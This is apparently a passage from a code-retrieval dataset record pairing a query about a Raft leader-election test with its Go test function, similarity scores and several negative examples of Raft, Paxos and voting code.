Follower:\n\t\t\t\t//if time.Now().Sub(rf.lastReceiveHeartBeat) > (timeOut - time.Millisecond*time.Duration(10)) {\n\t\t\t\tif time.Now().Sub(rf.lastReceiveHeartBeat) > timeOut {\n\t\t\t\t\trf.state = Candidate\n\t\t\t\t\t//DPrintf(\"follower %v startElection\",rf)\n\t\t\t\t\tgo rf.startElection() // warn follower转为candidate后应立即startElection,不再等待新的ElectionTimeOUt\n\t\t\t\t}\n\t\t\t}\n\t\t\trf.mu.Unlock()\n\t\t} else {\n\t\t\treturn\n\t\t}\n\t}\n}" ]
[ "0.69972724", "0.6816061", "0.6698817", "0.6691727", "0.6545872", "0.6444551", "0.6347674", "0.6304992", "0.6195448", "0.61766136", "0.6131735", "0.6121858", "0.6079972", "0.60769695", "0.6027061", "0.6016548", "0.6013733", "0.60108995", "0.59614134", "0.5916561", "0.59080714", "0.58770865", "0.586108", "0.58128816", "0.5810092", "0.5719001", "0.57137203", "0.5675296", "0.5673297", "0.56280065", "0.5612439", "0.557814", "0.5496953", "0.5493355", "0.5484306", "0.5473062", "0.5465011", "0.5439183", "0.54379267", "0.54336816", "0.5370662", "0.5342658", "0.53324527", "0.53314507", "0.53137344", "0.52965957", "0.5289587", "0.5288583", "0.5288163", "0.5274651", "0.52591723", "0.52574784", "0.5234236", "0.523207", "0.5227623", "0.52202123", "0.5210809", "0.5208646", "0.5206287", "0.5198492", "0.51983434", "0.5195866", "0.5191746", "0.5190047", "0.5189357", "0.51869994", "0.5181548", "0.5174625", "0.51739275", "0.51656306", "0.51586175", "0.51532274", "0.513276", "0.51180243", "0.51154226", "0.5094529", "0.5085391", "0.50749123", "0.5073035", "0.50700337", "0.5054675", "0.50458735", "0.5043393", "0.5041688", "0.5039055", "0.5033478", "0.5030416", "0.50282043", "0.50118244", "0.5009364", "0.5001558", "0.49937698", "0.49922168", "0.4991956", "0.49833885", "0.49763036", "0.49686804", "0.49613073", "0.49606332", "0.49563247" ]
0.8241493
0
TestLeaderElectionInOneRoundRPC tests all cases that may happen in leader election during one round of RequestVote RPC: a) it wins the election b) it loses the election c) it is unclear about the result Reference: section 5.2
func TestLeaderElectionInOneRoundRPC(t *testing.T) { tests := []struct { size int votes map[uint64]bool state StateType }{ // win the election when receiving votes from a majority of the servers {1, map[uint64]bool{}, StateLeader}, {3, map[uint64]bool{2: true, 3: true}, StateLeader}, {3, map[uint64]bool{2: true}, StateLeader}, {5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, StateLeader}, {5, map[uint64]bool{2: true, 3: true, 4: true}, StateLeader}, {5, map[uint64]bool{2: true, 3: true}, StateLeader}, // return to follower state if it receives vote denial from a majority {3, map[uint64]bool{2: false, 3: false}, StateFollower}, {5, map[uint64]bool{2: false, 3: false, 4: false, 5: false}, StateFollower}, {5, map[uint64]bool{2: true, 3: false, 4: false, 5: false}, StateFollower}, // stay in candidate if it does not obtain the majority {3, map[uint64]bool{}, StateCandidate}, {5, map[uint64]bool{2: true}, StateCandidate}, {5, map[uint64]bool{2: false, 3: false}, StateCandidate}, {5, map[uint64]bool{}, StateCandidate}, } for i, tt := range tests { r := newTestRaft(1, idsBySize(tt.size), 10, 1, NewMemoryStorage()) defer closeAndFreeRaft(r) r.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup}) for id, vote := range tt.votes { r.Step(pb.Message{From: id, To: 1, Term: r.Term, Type: pb.MsgVoteResp, Reject: !vote}) } if r.state != tt.state { t.Errorf("#%d: state = %s, want %s", i, r.state, tt.state) } if g := r.Term; g != 1 { t.Errorf("#%d: term = %d, want %d", i, g, 1) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func testNonleaderStartElection(t *testing.T, state StateType) {\n\t// election timeout\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tswitch state {\n\tcase StateFollower:\n\t\tr.becomeFollower(1, 2)\n\tcase StateCandidate:\n\t\tr.becomeCandidate()\n\t}\n\n\tfor i := 1; i < 2*et; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.Term != 2 {\n\t\tt.Errorf(\"term = %d, want 2\", r.Term)\n\t}\n\tif r.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateCandidate)\n\t}\n\tif !r.votes[r.id] {\n\t\tt.Errorf(\"vote for self = false, want true\")\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %v, want %v\", msgs, wmsgs)\n\t}\n}", "func TestPreVoteWithSplitVote(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// simulate leader down. followers start split vote.\n\tnt.isolate(1)\n\tnt.send([]pb.Message{\n\t\t{From: 2, To: 2, Type: pb.MsgHup},\n\t\t{From: 3, To: 3, Type: pb.MsgHup},\n\t}...)\n\n\t// check whether the term values are expected\n\t// n2.Term == 3\n\t// n3.Term == 3\n\tsm := nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\t// check state\n\t// n2 == candidate\n\t// n3 == candidate\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\n\t// node 2 election timeout first\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// n2.Term == 4\n\t// n3.Term == 4\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 4)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 4)\n\t}\n\n\t// check state\n\t// n2 == leader\n\t// n3 == follower\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n}", "func TestLeaderElectionReceiveMessages(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// Replayed ViewChange message should be ignored. Idempotent.\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from self should be ignored.\n\tvc = &pb.ViewChange{NodeId: 1, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for past view should be ignored.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 0}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from node 2 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n\tif exp, a := uint64(1), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n\n\t// The rest of the ViewChange messages should be ignored.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tvc = &pb.ViewChange{NodeId: 4, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n}", "func TestPreVoteWithCheckQuorum(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tn1.checkQuorum = true\n\tn2.checkQuorum = true\n\tn3.checkQuorum = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// isolate node 1. node 2 and node 3 have leader info\n\tnt.isolate(1)\n\n\t// check state\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Fatalf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\t// node 2 will ignore node 3's PreVote\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// Do we have a leader?\n\tif n2.state != StateLeader && n3.state != StateFollower {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func (a *RPC) VoteForLeader(args *RequestVoteRPCArgs,reply *bool) error{\n\t//r.ResetTimer()\n \t//fmt.Println(\"received Vote request parameter \",(*args).CandidateId,\" \",(*args).Term,\" \",(*args).LastLogTerm,\" \",(*args).LastLogIndex)\n \t//if len(r.Log)>1{\n \t//\tfmt.Println(\"Vote Request folloer parameter \",r.Id,\" \", r.CurrentTerm,\" \",r.Log[len(r.Log)-1].Term ,\" \",len(r.Log)-1)\n \t//}\n\tif r.IsLeader==2 { // if this server is follower\n\t\t//r.ResetTimer() //TODO\n\t\tif r.CurrentTerm > args.Term || r.VotedFor >-1 { // if follower has updated Term or already voted for other candidate in same term , reply nagative\n\t\t\t*reply = false\n\t\t} else if r.VotedFor== -1{ // if follower has not voted for anyone in current Term \n\t\t\tlastIndex:= len(r.Log) \n\t\t\tif lastIndex > 0 && args.LastLogIndex >0{ // if Candiate log and this server log is not empty. \n\t\t\t\tif r.Log[lastIndex-1].Term > args.LastLogTerm { // and Term of last log in follower is updated than Candidate, reject vote\n *reply=false\n }else if r.Log[lastIndex-1].Term == args.LastLogTerm{ // else if Terms of Follower and candidate is same\n \tif (lastIndex-1) >args.LastLogIndex { // but follower log is more updated, reject vote\n \t\t*reply = false\n \t} else {\n \t\t\t*reply = true // If last log terms is match and followe log is sync with candiate, vote for candidate\n \t\t}\n }else{ // if last log term is not updated and Term does not match, \n \t \t\t*reply=true//means follower is lagging behind candiate in log entries, vote for candidate\n \t\t}\n \t\n\t\t\t} else if lastIndex >args.LastLogIndex { // either of them is Zero\n\t\t\t\t*reply = false // if Follower has entries in Log, its more updated, reject vote\n\t\t\t}else{\n\t\t\t\t\t*reply = true // else Vote for candiate\n\t\t\t\t}\n\t\t}else{\n\t\t\t*reply=false\n\t\t}\n\t}else{\n\t\t*reply = false // This server is already a leader or candiate, reject vote\n\t}\n\n\tif(*reply) {\n r.VotedFor=args.CandidateId // Set Voted for to candiate Id if this server has voted positive\n }\n\t/*if(*reply) {\n\t\tfmt.Println(\"Follower \",r.Id,\" Voted for \",r.VotedFor)\n\t}else{\n\t\tfmt.Println(\"Follower \",r.Id,\" rejected vote for \",args.CandidateId)\n\t}*/\n\treturn nil\n}", "func (r *Raft) CallElection(){\n\t\n\tr.CurrentTerm+=1 // increase the current term by 1 to avoid conflict\n\tVoteAckcount:=1 // Number of vote received, initialised to 1 as own vote fo candiate is positive\n\tr.IsLeader = 0 // Set the state of server as candiate\n\tvar VoteCount =make (chan int,(len(r.ClusterConfigV.Servers)-1))\n\t//fmt.Println(\"Sending vote requests for:\",r.Id)\n\t\n\tfor _,server := range r.ClusterConfigV.Servers {\t\t\t\n\t\t\t\tif server.Id != r.Id{\n\t\t\t\t\tgo r.sendVoteRequestRpc(server,VoteCount) \t\t\t\t\t\n\t\t\t\t}}\n\n\tfor i:=0;i< len(r.ClusterConfigV.Servers)-1;i++ {\n\t\t\t\t\tVoteAckcount = VoteAckcount+ <- VoteCount \n\t\t\t\t\t// if Candiate gets majoirty, declare candiate as Leader and send immediae heartbeat to followers declaring\n\t\t\t\t\t// election of new leader\n\t\t\t\tif VoteAckcount > (len(r.ClusterConfigV.Servers)/2) && r.IsLeader == 0 { \n\t\t\t\t\tlog.Println(\"New leader is:\",r.Id)\n\t\t\t\t\tr.IsLeader=1\n\t\t\t\t\tr.LeaderId=r.Id\n\t\t\t\t\traft.SendImmediateHeartBit <- 1\n\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\t\t\n\t\tif r.IsLeader==1{\n\t\t\t// initlised next index to lastlog index, and match index to 0 fro all servers\n\t\tfor _,server := range r.ClusterConfigV.Servers {\n\t\t\t\tr.NextIndex[server.Id]=len(r.Log)\n\t\t\t\tr.MatchIndex[server.Id]=0\n\t\t\t\tr.ResetTimer()\n\t\t\t}\n\t\t}else{ \n\t\t\t// Is candidate fails to get elected, fall back to follower state and reset timer for reelection \n\t\t\tr.IsLeader=2\n\t\t\tr.ResetTimer()\n\t\t}\n}", "func (node *Node) runElection() {\n\tnode.currentTerm++\n\tcurrentTerm := node.currentTerm\n\tnode.state = candidate\n\tnode.votedFor = node.id\n\tnode.timeSinceTillLastReset = time.Now()\n\n\tlog.Printf(\"Node %d has become a candidate with currentTerm=%d\", node.id, node.currentTerm)\n\n\t// We vote for ourselves.\n\tvar votesReceived int32 = 1\n\n\t// Send votes to all the other machines in the raft group.\n\tfor _, nodeID := range node.participantNodes {\n\t\tgo func(id int) {\n\t\t\tvoteRequestArgs := RequestVoteArgs{\n\t\t\t\tterm: currentTerm,\n\t\t\t\tcandidateID: id,\n\t\t\t}\n\n\t\t\tvar reply RequestVoteReply\n\t\t\tlog.Printf(\"Sending a RequestVote to %d with args %+v\", id, voteRequestArgs)\n\n\t\t\tif err := node.server.Call(id, \"Node.RequestVote\", voteRequestArgs, &reply); err == nil {\n\t\t\t\tlog.Printf(\"Received a response for RequestVote from node %d saying %+v, for the election started by node %d\", id, reply, node.id)\n\n\t\t\t\tnode.mu.Lock()\n\t\t\t\tdefer node.mu.Unlock()\n\n\t\t\t\t// If the state of the current node has changed by the time the election response arrives then we must back off.\n\t\t\t\tif node.state != candidate {\n\t\t\t\t\tlog.Printf(\"The state of node %d has changed from candidate to %s while waiting for an election response\", node.id, node.state)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// If the node responds with a higher term then we must back off from the election.\n\t\t\t\tif reply.term > currentTerm {\n\t\t\t\t\tnode.updateStateToFollower(reply.term)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tif reply.term == currentTerm {\n\t\t\t\t\tif reply.voteGranted {\n\t\t\t\t\t\tvotes := int(atomic.AddInt32(&votesReceived, 1))\n\t\t\t\t\t\t// Check for majority votes having been received.\n\t\t\t\t\t\tif votes > (len(node.participantNodes)+1)/2 {\n\t\t\t\t\t\t\tlog.Printf(\"The election has been won by node %d\", node.id)\n\t\t\t\t\t\t\tnode.updateStateToLeader()\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}(nodeID)\n\t}\n}", "func TestVoter_Vote(t *testing.T) {\n\tallia := sdk.NewOntologySdk()\n\tallia.NewRpcClient().SetAddress(RpcAddr)\n\tvoting := make(chan *btc.BtcProof, 10)\n\n\tacct, err := GetAccountByPassword(allia, \"../cmd/lightcli/wallet.dat\", \"passwordtest\")\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to get acct: %v\", err)\n\t}\n\n\tconf := spvwallet.NewDefaultConfig()\n\tconf.RepoPath = \"./\"\n\tconf.Params = &chaincfg.TestNet3Params\n\tsqliteDatastore, err := db.Create(conf.RepoPath)\n\tif err != nil {\n\t\tt.Fatalf(\"failed to create sqlite db: %v\", err)\n\t}\n\tconf.DB = sqliteDatastore\n\twallet, _ := spvwallet.NewSPVWallet(conf)\n\tredeem, _ := hex.DecodeString(\"5521023ac710e73e1410718530b2686ce47f12fa3c470a9eb6085976b70b01c64c9f732102c9dc4d8f419e325bbef0fe039ed6feaf2079a2ef7b27336ddb79be2ea6e334bf2102eac939f2f0873894d8bf0ef2f8bbdd32e4290cbf9632b59dee743529c0af9e802103378b4a3854c88cca8bfed2558e9875a144521df4a75ab37a206049ccef12be692103495a81957ce65e3359c114e6c2fe9f97568be491e3f24d6fa66cc542e360cd662102d43e29299971e802160a92cfcd4037e8ae83fb8f6af138684bebdc5686f3b9db21031e415c04cbc9b81fbee6e04d8c902e8f61109a2c9883a959ba528c52698c055a57ae\")\n\n\twallet.Start()\n\tdefer func() {\n\t\twallet.Close()\n\t\tos.RemoveAll(\"./peers.json\")\n\t\tos.RemoveAll(\"./waiting.bin\")\n\t\tos.RemoveAll(\"./headers.bin\")\n\t\tos.RemoveAll(\"./wallet.db\")\n\t}()\n\n\tquit := make(chan struct{})\n\tv, err := NewVoter(allia, voting, wallet, redeem, acct, 0, 20000, \"\", 6, quit)\n\tif err != nil {\n\t\tt.Fatalf(\"failed to new voter: %v\", err)\n\t}\n\n\tgo v.Vote()\n\tgo v.WaitingRetry()\n\n\tsink := common.NewZeroCopySink(nil)\n\tBp1.Serialization(sink)\n\n\tgo func() {\n\t\tfor {\n\t\t\tvoting <- Bp1\n\t\t\ttime.Sleep(2 * time.Second)\n\t\t}\n\t}()\n\n\ttime.Sleep(time.Second * 10)\n}", "func TestLeaderElectionJumpToGreaterView(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for larger view should replace current attempt.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 2)\n\n\t// ViewChange message from node 1 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 3)\n\tif exp, a := uint64(6), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n}", "func TestElection_HasVoted(t *testing.T) {\n\ttestDatabase := database.StormDB{\n\t\tFile: \"election_testdb.db\",\n\t}\n\terr := testDatabase.Connect()\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't connect to database. Error: %s\", err.Error())\n\t}\n\ttestVoter := models.Voter{\n\t\tStudentID: 1,\n\t\tCohort: 1,\n\t\tName: \"Prof Sturman\",\n\t}\n\ttestVoterWontVote := models.Voter{\n\t\tStudentID: 2,\n\t\tCohort: 1,\n\t\tName: \"Prof Goldschmidt\",\n\t}\n\ttestCandidate := models.Candidate{\n\t\tID: 1,\n\t\tCohort: 1,\n\t\tName: \"Joey Lyon\",\n\t}\n\n\terr = testDatabase.StoreVoter(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test voter to database\")\n\t}\n\terr = testDatabase.StoreVoter(testVoterWontVote)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test voter to database\")\n\t}\n\terr = testDatabase.StoreCandidate(testCandidate)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test candidate to database\")\n\t}\n\n\te := New(&testDatabase, false, []string{})\n\t// Begin testing HasVoted function\n\tret, err := e.HasVoted(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret {\n\t\tt.Errorf(\"HasVoted returned true when a voter hasn't voted\")\n\t}\n\n\tvote := &models.Vote{\n\t\tCandidate: 1,\n\t\tStudentID: 1,\n\t}\n\tvote.HashVote(&testVoter)\n\te.CastVotes(&testVoter, []models.Vote{*vote})\n\tret, err = e.HasVoted(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret == false {\n\t\tt.Errorf(\"HasVoted returned false when a voter has voted\")\n\t}\n\n\tret, err = e.HasVoted(testVoterWontVote)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret {\n\t\tt.Errorf(\"HasVoted returned true when a voter has not voted\")\n\t}\n\terr = os.Remove(\"election_testdb.db\")\n\tif err != nil {\n\t\tt.Log(\"Cleanup failed\")\n\t}\n}", "func (r *Raft) callRequestVote(server int, args requestVoteArgs, reply *requestVoteReply) bool {\n\t// When there are no peers, return a test response, if any.\n\tif len(r.peers) == 0 {\n\t\t// Under test, return injected reply.\n\t\tglog.V(2).Infof(\"Under test, returning injected reply %v\", reply)\n\t\tif r.testRequestvotesuccess {\n\t\t\t*reply = *r.testRequestvotereply\n\t\t}\n\t\treturn r.testRequestvotesuccess\n\t}\n\tok := r.peers[server].Call(\"Raft.RequestVote\", args, reply)\n\treturn ok\n}", "func (rf *Raft) runElection() {\n\t// get election start time\n\tlastElectionCheck := time.Now()\n\n\trf.mu.Lock()\n\trf.currentTerm++\n\t// persist - updated current term\n\tdata := rf.GetStateBytes(false)\n\trf.persister.SaveRaftState(data)\n\trf.Log(LogInfo, \"running as candidate\")\n\n\t// set as candidate state and vote for ourselves,\n\t// also reset the timer\n\trf.votedFor = rf.me\n\trf.state = Candidate\n\trf.electionTimeout = GetRandomElectionTimeout()\n\n\t// for holding replies - we send out the requests concurrently\n\treplies := make([]*RequestVoteReply, len(rf.peers))\n\tfor servIdx := range rf.peers {\n\t\treplies[servIdx] = &RequestVoteReply{}\n\t}\n\n\t// send out requests concurrently\n\tfor servIdx := range rf.peers {\n\t\tif servIdx != rf.me {\n\t\t\targs := &RequestVoteArgs{\n\t\t\t\tCandidateTerm: rf.currentTerm,\n\t\t\t}\n\n\t\t\t// grab last log index and term - default to snapshot if log is []\n\t\t\tif len(rf.log) > 0 {\n\t\t\t\targs.LastLogIndex = rf.log[len(rf.log)-1].Index\n\t\t\t\targs.LastLogTerm = rf.log[len(rf.log)-1].Term\n\t\t\t} else {\n\t\t\t\targs.LastLogIndex = rf.lastIncludedIndex\n\t\t\t\targs.LastLogTerm = rf.lastIncludedTerm\n\t\t\t}\n\t\t\t// only place the reply into replies, when the RPC completes,\n\t\t\t// to prevent partial data (unsure if this can happen but seems like a good idea)\n\t\t\tgo func(servIdx int) {\n\t\t\t\treply := &RequestVoteReply{}\n\t\t\t\trf.Log(LogDebug, \"Sending RequestVote to servIdx\", servIdx)\n\t\t\t\tok := rf.sendRequestVote(servIdx, args, reply)\n\t\t\t\tif ok {\n\t\t\t\t\trf.Log(LogDebug, \"Received RequestVote reply from server\", servIdx, \"\\n - reply\", reply)\n\t\t\t\t\treplies[servIdx] = reply\n\t\t\t\t}\n\t\t\t}(servIdx)\n\t\t}\n\t}\n\trf.mu.Unlock()\n\n\t// while we still have time on the clock, poll\n\t// for election result\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\t\tif rf.state == Follower {\n\t\t\trf.Log(LogInfo, \"now a follower\")\n\t\t\t// we must have received a heartbeat message from a new leader\n\t\t\t// stop the election\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if rf.electionTimeout > 0 {\n\t\t\t// election still running\n\t\t\t// do a vote count and update time remaining\n\t\t\tcurrentTime := time.Now()\n\t\t\trf.electionTimeout -= (currentTime.Sub(lastElectionCheck))\n\t\t\tlastElectionCheck = currentTime\n\t\t\tvotes := 1 // we vote for ourselves automatically\n\t\t\tfor servIdx := range rf.peers {\n\t\t\t\t// need a successful vote AND need that our term hasn't increased (e.g. if\n\t\t\t\t// since the last loop, we voted for a server with a higher term)\n\t\t\t\tif servIdx != rf.me && replies[servIdx].VoteGranted && replies[servIdx].CurrentTerm == rf.currentTerm {\n\t\t\t\t\tvotes++\n\t\t\t\t}\n\t\t\t}\n\t\t\t// majority vote achieved - set state as leader and\n\t\t\t// start sending heartbeats\n\t\t\tif votes >= int(math.Ceil(float64(len(rf.peers))/2.0)) {\n\t\t\t\trf.Log(LogInfo, \"elected leader\", \"\\n - rf.log:\", rf.log, \"\\n - rf.commitIndex\", rf.commitIndex)\n\t\t\t\trf.state = Leader\n\n\t\t\t\t// get next index of the log for rf.nextIndex\n\t\t\t\tnextIdx := rf.lastIncludedIndex + 1\n\t\t\t\tif len(rf.log) > 0 {\n\t\t\t\t\tnextIdx = rf.log[len(rf.log)-1].Index + 1\n\t\t\t\t}\n\n\t\t\t\t// this volatile state is reinitialized on election\n\t\t\t\tfor servIdx := range rf.peers {\n\t\t\t\t\tif servIdx != rf.me {\n\t\t\t\t\t\trf.nextIndex[servIdx] = nextIdx\n\t\t\t\t\t\trf.matchIndex[servIdx] = 0\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tgo rf.heartbeatAppendEntries()\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\t// no result - need to rerun election\n\t\t\trf.Log(LogInfo, \"timed out as candidate\")\n\t\t\trf.mu.Unlock()\n\t\t\tgo rf.runElection()\n\t\t\treturn\n\t\t}\n\t\trf.mu.Unlock()\n\t\ttime.Sleep(defaultPollInterval)\n\t}\n}", "func TestOnlineElection(t *testing.T) {\n\tvar cases = []struct {\n\t\tpersons []int\n\t\ttimes []int\n\t\tq []int\n\t\ta []int\n\t}{\n\t\t//{\n\t\t//\tpersons: []int{0, 1, 1, 0, 0, 1, 0},\n\t\t//\ttimes: []int{0, 5, 10, 15, 20, 25, 30},\n\t\t//\tq: []int{3, 12, 25, 15, 24, 8},\n\t\t//\ta: []int{0, 1, 1, 0, 0, 1},\n\t\t//},\n\t\t{\n\t\t\tpersons: []int{0, 1, 0, 1, 